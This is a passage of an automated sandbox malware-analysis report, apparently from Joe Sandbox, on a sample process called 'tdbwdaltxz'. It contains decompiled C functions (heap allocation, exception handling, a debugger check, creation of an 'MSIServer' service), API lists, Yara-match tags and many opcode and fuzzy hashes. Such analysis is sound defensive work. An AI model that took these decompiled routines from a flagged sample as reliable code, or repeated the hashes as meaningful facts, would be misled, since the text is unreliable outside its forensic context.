                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: ee0fe6bd0be598dfd4071266fcc3a76ffc49ad7927e725038007435c78b95f8b
                        • Instruction ID: 0cb9ef9fe9c0cfe745727139573ad959f5010b979b2a458d86e8a0fd83e31d69
                        • Opcode Fuzzy Hash: ee0fe6bd0be598dfd4071266fcc3a76ffc49ad7927e725038007435c78b95f8b
                        • Instruction Fuzzy Hash: D262C174E002298FDB64DF69C890BEEFBB2BB49304F5481E9D849A7255DB319E81CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 01056B34
                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: aa6ecc2c0dab287099aebd012d17b9250bab465c3b05f873e1f6059e561dee2f
                        • Instruction ID: 57936f5b05adce1cfd7385b7fcfee57efa5e2af23cef6659778b19daab217b30
                        • Opcode Fuzzy Hash: aa6ecc2c0dab287099aebd012d17b9250bab465c3b05f873e1f6059e561dee2f
                        • Instruction Fuzzy Hash: 3BD1A178E00218CFDB54DFA9D854BADBBB2BF89304F2080A9D809AB355DB355E85DF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 01058D2B
                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 3f6811cc011cc3708efcd76f18f905b0a2cf651c39b5f85309aafcfc9dcef705
                        • Instruction ID: ffe3e9386468966114b097b5fb57f68f492fd4359216ff038c324257fce4ef9e
                        • Opcode Fuzzy Hash: 3f6811cc011cc3708efcd76f18f905b0a2cf651c39b5f85309aafcfc9dcef705
                        • Instruction Fuzzy Hash: 1FD1A074E00218CFDB54DFA9D894BADBBB2BF89304F2080AAD809A7355DB355E85DF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1381 401e16-401e21 SetUnhandledExceptionFilter
                        C-Code - Quality: 100%
                        			E00401E16() {
                        				_Unknown_base(*)()* _t1;
                        
                        				_t1 = SetUnhandledExceptionFilter(E00401E22); // executed
                        				return _t1;
                        			}




                        0x00401e1b
                        0x00401e21

                        APIs
                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E22,0040170D), ref: 00401E1B
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 7cc42e0c232be2002621d7aac29e4c4a89884d8af04e1807cbd6d37abe40dfe2
                        • Instruction ID: 1700cd800284021a96fa1165edcf07aa52b884b6f150888f85792e917e9d8571
                        • Opcode Fuzzy Hash: 7cc42e0c232be2002621d7aac29e4c4a89884d8af04e1807cbd6d37abe40dfe2
                        • Instruction Fuzzy Hash:
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1bb2e0e171d20e8b5b2cbcb9f154a5963e789709b11f1b01320dc3a12fae1425
                        • Instruction ID: 30ed87cb63f1625f539a0d0ad8842c4ab152adfefde0a39d4dea11e25917224b
                        • Opcode Fuzzy Hash: 1bb2e0e171d20e8b5b2cbcb9f154a5963e789709b11f1b01320dc3a12fae1425
                        • Instruction Fuzzy Hash: 13125774E002198FDB54DFA8C9507AEBBF2BF89304F2084A9D849AB395DB359D42CF51
                        Uniqueness

                        Uniqueness Score: -1.00%


                        Control-flow Graph

                        C-Code - Quality: 100%
                        			E00407507() {
                        				WCHAR* _t1;
                        				void* _t3;
                        				void* _t17;
                        				WCHAR* _t19;
                        
                        				_t1 = GetEnvironmentStringsW();
                        				_t19 = _t1;
                        				if(_t19 != 0) {
                        					_t11 = E004074D0(_t19) - _t19 & 0xfffffffe;
                        					_t3 = E00407D48(E004074D0(_t19) - _t19 & 0xfffffffe); // executed
                        					_t17 = _t3;
                        					if(_t17 != 0) {
                        						E00403120(_t17, _t19, _t11);
                        					}
                        					E0040650B(0);
                        					FreeEnvironmentStringsW(_t19);
                        					return _t17;
                        				} else {
                        					return _t1;
                        				}
                        			}








                        APIs
                        • GetEnvironmentStringsW.KERNEL32(?,00404A94), ref: 0040750A
                        • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,00404A94), ref: 00407549
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: EnvironmentStrings$Free
                        • String ID:
                        • API String ID: 3328510275-0
                        • Opcode ID: 687c54f429ede6c9a3700f1b62dc63b57466bf3dfbcabf1351402392e6b5ef8b
                        • Instruction ID: b1f7f09f612f60460f80359e47cfd29f29434f3d7477643bc4f3bdfe63dfc6bb
                        • Opcode Fuzzy Hash: 687c54f429ede6c9a3700f1b62dc63b57466bf3dfbcabf1351402392e6b5ef8b
                        • Instruction Fuzzy Hash: 44E09B3754D63136D112323A7C4999F1A0DCFC6679715023BF4147A2C5EE789D0200EE
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 01053EAE
                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 0672f81ceb52dce45d9753ed6c0923710d3839e06b7ed54d03eef9d416d3107a
                        • Instruction ID: 8c584a99f86072a9cc58d67b993eed516bcc05ad252ae4d58b70facb1d978784
                        • Opcode Fuzzy Hash: 0672f81ceb52dce45d9753ed6c0923710d3839e06b7ed54d03eef9d416d3107a
                        • Instruction Fuzzy Hash: DA51CF749A4246CFC3006F71F5BE52EBB65FB9F39B724BC15A41AD3156DB7010688E20
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 1da225d33c8d78af49e0f36f3bbfdf933542e2063adbabbff06ee2f0cb02596d
                        • Instruction ID: b38b03937bbd385d7adf72bcdde5137a00a850da18a84ce2b52c8ff5c05a9f63
                        • Opcode Fuzzy Hash: 1da225d33c8d78af49e0f36f3bbfdf933542e2063adbabbff06ee2f0cb02596d
                        • Instruction Fuzzy Hash: B841AD74A01228CFCB65DF68D894BE9B7B2BB89305F5086EAD449A7361D7319E81CF00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 100%
                        			E004064AE(signed int _a4, signed int _a8) {
                        				void* _t8;
                        				void* _t12;
                        				signed int _t13;
                        				signed int _t18;
                        				long _t19;
                        
                        				_t18 = _a4;
                        				if(_t18 == 0) {
                        					L2:
                        					_t19 = _t18 * _a8;
                        					if(_t19 == 0) {
                        						_t19 = _t19 + 1;
                        					}
                        					while(1) {
                        						_t8 = RtlAllocateHeap( *0x4163ec, 8, _t19); // executed
                        						if(_t8 != 0) {
                        							break;
                        						}
                        						__eflags = E004051C4();
                        						if(__eflags == 0) {
                        							L8:
                        							 *((intOrPtr*)(E0040649B())) = 0xc;
                        							__eflags = 0;
                        							return 0;
                        						}
                        						_t12 = E004087B5(__eflags, _t19);
                        						__eflags = _t12;
                        						if(_t12 == 0) {
                        							goto L8;
                        						}
                        					}
                        					return _t8;
                        				}
                        				_t13 = 0xffffffe0;
                        				if(_t13 / _t18 < _a8) {
                        					goto L8;
                        				}
                        				goto L2;
                        			}









                        APIs
                        • RtlAllocateHeap.NTDLL(00000008,?,?,?,00405F2E,00000001,00000364,?,00000007,000000FF,?,?,004064A0,004050A7,?,00401668), ref: 004064EF
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 8f646ef87f97bce7b3fbb940021f70ed9acc1b429a1aae06431b718667ad30f8
                        • Instruction ID: 3efc618f0b7f40eca7bec11a0985368c4a4d2247eacbb5d5b70fa3bd5a8b9347
                        • Opcode Fuzzy Hash: 8f646ef87f97bce7b3fbb940021f70ed9acc1b429a1aae06431b718667ad30f8
                        • Instruction Fuzzy Hash: F6F0B43160852466DB219F22DD05B5B3758DB81770B17853BAC5ABA2C0CA78E82196AC
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 100%
                        			E00407D48(long _a4) {
                        				void* _t4;
                        				void* _t6;
                        				long _t8;
                        
                        				_t8 = _a4;
                        				if(_t8 > 0xffffffe0) {
                        					L7:
                        					 *((intOrPtr*)(E0040649B())) = 0xc;
                        					__eflags = 0;
                        					return 0;
                        				}
                        				if(_t8 == 0) {
                        					_t8 = _t8 + 1;
                        				}
                        				while(1) {
                        					_t4 = RtlAllocateHeap( *0x4163ec, 0, _t8); // executed
                        					if(_t4 != 0) {
                        						break;
                        					}
                        					__eflags = E004051C4();
                        					if(__eflags == 0) {
                        						goto L7;
                        					}
                        					_t6 = E004087B5(__eflags, _t8);
                        					__eflags = _t6;
                        					if(_t6 == 0) {
                        						goto L7;
                        					}
                        				}
                        				return _t4;
                        			}







                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,00406E77,?,?,00406E77,00000220,?,00000000,?), ref: 00407D7A
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 8f5a00a2164cb918ef53a9def0475eb471bdd7ac5a97f66a80c2262a2e0ab220
                        • Instruction ID: 65cd16bcdc1b8bd721fcda30d9bca64849d6530a3f0c9080c4415b1d98ca3938
                        • Opcode Fuzzy Hash: 8f5a00a2164cb918ef53a9def0475eb471bdd7ac5a97f66a80c2262a2e0ab220
                        • Instruction Fuzzy Hash: 9FE0A931A0862456EA202B269C00F6B3A498F823B0B154233EC05B62D2DA7DE80182AF
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000002.00000002.518940564.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_e9d000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3217c84e4a1ff55aa9d7b02b2e6afd92f580cc8ee4e65026247148ee63ca25dc
                        • Instruction ID: 52da0242a2bad91415329516b67fd0c537ce677f68d6543e281a8877eb9bca9c
                        • Opcode Fuzzy Hash: 3217c84e4a1ff55aa9d7b02b2e6afd92f580cc8ee4e65026247148ee63ca25dc
                        • Instruction Fuzzy Hash: EF2100B1608240DFDF15DF24DDC0B66BF65FB98324F2485A9E8092B247C336D856CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000002.00000002.518940564.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_e9d000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 21f8d5b6b5d265f3530d2e2055ecdcd9d3d876365d97dcc12f9a0a1ffe70c008
                        • Instruction ID: da2e93f8a5bdc006c8f0ebbc4afb570e4800d0ea3bc948db0df1af4437651500
                        • Opcode Fuzzy Hash: 21f8d5b6b5d265f3530d2e2055ecdcd9d3d876365d97dcc12f9a0a1ffe70c008
                        • Instruction Fuzzy Hash: 762103B1508340EFDF11DF18D9C0B26BF65FB88318F248569E8056B246C336D856DBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000002.00000002.518997878.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_ead000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5be906533b51484575a8461ede10a1d55e682ecf43e8edb608410edf172f4207
                        • Instruction ID: 95b5e1b9621528f2e4c61acd73d6e86fdcb406e8687b8a144aed7168cfc15452
                        • Opcode Fuzzy Hash: 5be906533b51484575a8461ede10a1d55e682ecf43e8edb608410edf172f4207
                        • Instruction Fuzzy Hash: 8C21F571608340DFDB15DF24D9C4B26BF66FB89318F24C5A9E84A5F646C336E807CA61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000002.00000002.518997878.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_ead000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 666cda6bf839e2fc1a9edeadfc145b2f9318c8fb34c882e0b7934e47c8432afa
                        • Instruction ID: ed7735cb35d1c057b24a574abed00811d0ac1dd3010adaa21e74a5d1c0f5930e
                        • Opcode Fuzzy Hash: 666cda6bf839e2fc1a9edeadfc145b2f9318c8fb34c882e0b7934e47c8432afa
                        • Instruction Fuzzy Hash: 17214F7550D3808FDB12CF24D9D4715BF72AB4A314F28C5EAD8498F697C33A980ACB62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000002.00000002.518940564.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_e9d000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6062e00843e0127835f222a966a73a669d8ce6edb45538b47e885cfc36e271a6
                        • Instruction ID: f598376606c5a65d54eb14f591012217bb542007ef7a4c04e1d939a4fb4049a4
                        • Opcode Fuzzy Hash: 6062e00843e0127835f222a966a73a669d8ce6edb45538b47e885cfc36e271a6
                        • Instruction Fuzzy Hash: 0611AC76508280DFCF12CF10D9C4B16BF61FB88324F24C6A9D8495B217C33AD85ACBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000002.00000002.518940564.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_e9d000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6062e00843e0127835f222a966a73a669d8ce6edb45538b47e885cfc36e271a6
                        • Instruction ID: 9df56ca5dd31a5b2644ff99f56dca70c8b51a1578e27fbf9acb7adfcc4c7be1b
                        • Opcode Fuzzy Hash: 6062e00843e0127835f222a966a73a669d8ce6edb45538b47e885cfc36e271a6
                        • Instruction Fuzzy Hash: 0E11D376508280DFCF12CF14D9C4B16BF71FB94328F24C6A9D8455B656C33AD85ACBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000002.00000002.518940564.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_e9d000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 35a62065d7be695e5cd6f12cf365108c4fd89b3d2708c024acd51bf817e3bb88
                        • Instruction ID: 8f5ebc8f87e601a3c8e6c0239396b05c4ef2620586ac6d2277a33eb62403d705
                        • Opcode Fuzzy Hash: 35a62065d7be695e5cd6f12cf365108c4fd89b3d2708c024acd51bf817e3bb88
                        • Instruction Fuzzy Hash: 76012D6140E3D09FD7128B358C94752BFB49F53224F1981DBE9889F2A3C2695848C772
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000002.00000002.518940564.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_e9d000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 598461ce8da9ec889a4760b7e9434072cbfd00127494b271f7d0d3b52643766f
                        • Instruction ID: 2b874611363d39402349244e65414cb9088829b43fb004d274d6b902c8827bc4
                        • Opcode Fuzzy Hash: 598461ce8da9ec889a4760b7e9434072cbfd00127494b271f7d0d3b52643766f
                        • Instruction Fuzzy Hash: 8C01F77150C3509AEB118A2ACC847A7FF98EF41328F18D15AFD446B282C3799845C7B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 81%
                        			E010610B0() {
                        				short _v548;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				void* _t13;
                        				long _t14;
                        				void* _t18;
                        				void* _t27;
                        				void* _t29;
                        				void* _t30;
                        
                        				_t28 = 0;
                        				_t29 = OpenSCManagerW(0, L"ServicesActive", 2);
                        				if(_t29 != 0) {
                        					lstrcpyW(_t30 + GetSystemDirectoryW( &_v548, 0x104) * 2 - 0x220, L"\\msiexec /V");
                        					_t13 = CreateServiceW(_t29, L"MSIServer", L"MSIServer", 0x10000000, 0x20, 3, 1,  &_v548, 0, 0, 0, 0, 0);
                        					__eflags = _t13;
                        					if(_t13 == 0) {
                        						_t14 = GetLastError();
                        						__eflags = _t14 - 0x431;
                        						if(_t14 != 0x431) {
                        							_push("Failed to create MSI service\n");
                        							_t18 = E01062E24() + 0x40;
                        							__eflags = _t18;
                        							_push(_t18);
                        							E01062F67(_t27, 0, _t29, _t18);
                        							_t28 = 1;
                        						}
                        						CloseServiceHandle(_t29);
                        						return _t28;
                        					} else {
                        						CloseServiceHandle(_t13);
                        						CloseServiceHandle(_t29);
                        						return 0;
                        					}
                        				} else {
                        					_push("Failed to open the service control manager.\n");
                        					_t24 = E01062E24() + 0x40;
                        					_push(E01062E24() + 0x40);
                        					E01062F67(_t27, 0, _t29, _t24);
                        					_t1 = _t28 + 1; // 0x1
                        					return _t1;
                        				}
                        			}














                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000002), ref: 010610C5
                        • _fprintf.LIBCMT ref: 010610DF
                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 010610FC
                        • lstrcpyW.KERNEL32 ref: 0106110F
                        • CreateServiceW.ADVAPI32(00000000,MSIServer,MSIServer,10000000,00000020,00000003,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 0106113C
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 01061147
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 0106114E
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Service$CloseHandle$CreateDirectoryManagerOpenSystem_fprintflstrcpy
                        • String ID: Failed to create MSI service$Failed to open the service control manager.$MSIServer$ServicesActive$\msiexec /V
                        • API String ID: 3223182415-3703814818
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 85%
                        			E00401C83(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
                        				char _v0;
                        				struct _EXCEPTION_POINTERS _v12;
                        				intOrPtr _v80;
                        				intOrPtr _v88;
                        				char _v92;
                        				intOrPtr _v608;
                        				intOrPtr _v612;
                        				void* _v616;
                        				intOrPtr _v620;
                        				char _v624;
                        				intOrPtr _v628;
                        				intOrPtr _v632;
                        				intOrPtr _v636;
                        				intOrPtr _v640;
                        				intOrPtr _v644;
                        				intOrPtr _v648;
                        				intOrPtr _v652;
                        				intOrPtr _v656;
                        				intOrPtr _v660;
                        				intOrPtr _v664;
                        				intOrPtr _v668;
                        				char _v808;
                        				char* _t39;
                        				long _t49;
                        				intOrPtr _t51;
                        				void* _t54;
                        				intOrPtr _t55;
                        				intOrPtr _t57;
                        				intOrPtr _t58;
                        				intOrPtr _t59;
                        				intOrPtr* _t60;
                        
                        				_t59 = __esi;
                        				_t58 = __edi;
                        				_t57 = __edx;
                        				if(IsProcessorFeaturePresent(0x17) != 0) {
                        					_t55 = _a4;
                        					asm("int 0x29");
                        				}
                        				E00401E78(_t34);
                        				 *_t60 = 0x2cc;
                        				_v632 = E00402470(_t58,  &_v808, 0, 3);
                        				_v636 = _t55;
                        				_v640 = _t57;
                        				_v644 = _t51;
                        				_v648 = _t59;
                        				_v652 = _t58;
                        				_v608 = ss;
                        				_v620 = cs;
                        				_v656 = ds;
                        				_v660 = es;
                        				_v664 = fs;
                        				_v668 = gs;
                        				asm("pushfd");
                        				_pop( *_t15);
                        				_v624 = _v0;
                        				_t39 =  &_v0;
                        				_v612 = _t39;
                        				_v808 = 0x10001;
                        				_v628 =  *((intOrPtr*)(_t39 - 4));
                        				E00402470(_t58,  &_v92, 0, 0x50);
                        				_v92 = 0x40000015;
                        				_v88 = 1;
                        				_v80 = _v0;
                        				_t28 = IsDebuggerPresent() - 1; // -1
                        				_v12.ExceptionRecord =  &_v92;
                        				asm("sbb bl, bl");
                        				_v12.ContextRecord =  &_v808;
                        				_t54 =  ~_t28 + 1;
                        				SetUnhandledExceptionFilter(0);
                        				_t49 = UnhandledExceptionFilter( &_v12);
                        				if(_t49 == 0 && _t54 == 0) {
                        					_push(3);
                        					return E00401E78(_t49);
                        				}
                        				return _t49;
                        			}

                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00401C8F
                        • IsDebuggerPresent.KERNEL32 ref: 00401D5B
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00401D7B
                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00401D85
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                        • String ID:
                        • API String ID: 254469556-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E01061320(int _a4) {
                        				short _v8;
                        				signed int _v12;
                        				char _v92;
                        				short _v612;
                        				signed int _t33;
                        				void* _t41;
                        				void* _t55;
                        				struct HINSTANCE__* _t57;
                        
                        				_t57 = GetModuleHandleA("msi.dll");
                        				_v612 = 0;
                        				if(GetModuleFileNameW(_t57,  &_v612, 5) == 0) {
                        					GetLastError();
                        				}
                        				_v92 = 0;
                        				_v12 = 0xa;
                        				0x1060000( &_v612,  &_v92,  &_v12, 0, 0);
                        				_t33 = LoadStringW(_t57, 0xa,  &_v8, 0);
                        				_v12 = _t33;
                        				_v8 = HeapAlloc(GetProcessHeap(), 0, 2 + _t33 * 2);
                        				_t55 = HeapAlloc(GetProcessHeap(), 0, 0x52 + _v12 * 2);
                        				_t41 = _v8;
                        				if(_t41 != 0 && _t55 != 0) {
                        					 *_t41 = 0;
                        					LoadStringW(_t57, 0xa, _v8, _v12 + 1);
                        					swprintf(_t55, _v12 + 1, _v8,  &_v92);
                        					_t41 = _v8;
                        				}
                        				HeapFree(GetProcessHeap(), 0, _t41);
                        				HeapFree(GetProcessHeap(), 0, _t55);
                        				ExitProcess(_a4);
                        			}

                        APIs
                        • GetModuleHandleA.KERNEL32(msi.dll,?), ref: 01061331
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000005), ref: 0106134C
                        • GetLastError.KERNEL32 ref: 01061356
                        • LoadStringW.USER32(00000000,0000000A,00000001,00000000), ref: 01061388
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010613A1
                        • HeapAlloc.KERNEL32(00000000), ref: 010613AA
                        • GetProcessHeap.KERNEL32(00000000,0000000A), ref: 010613BC
                        • HeapAlloc.KERNEL32(00000000), ref: 010613BF
                        • LoadStringW.USER32(00000000,0000000A,00000001,0000000B), ref: 010613DE
                        • swprintf.LIBCMT ref: 010613F1
                        • GetProcessHeap.KERNEL32(00000000,00000001), ref: 01061405
                        • HeapFree.KERNEL32(00000000), ref: 0106140E
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01061413
                        • HeapFree.KERNEL32(00000000), ref: 01061416
                        • ExitProcess.KERNEL32 ref: 0106141B
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFreeLoadModuleString$ErrorExitFileHandleLastNameswprintf
                        • String ID: msi.dll
                        • API String ID: 4014995864-3974507041
                        Uniqueness

                        Uniqueness Score: -1.00%

